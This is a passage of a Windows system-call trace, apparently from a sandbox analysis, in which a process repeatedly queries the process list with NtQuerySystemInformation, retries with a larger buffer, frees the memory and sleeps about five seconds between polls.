FreeType=0x8000) returned 0x0 [0275.106] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.112] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.119] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.126] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.132] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.140] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.153] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.160] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.167] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.182] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.189] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.196] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.204] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.211] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.221] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.264] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.272] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.279] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.286] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 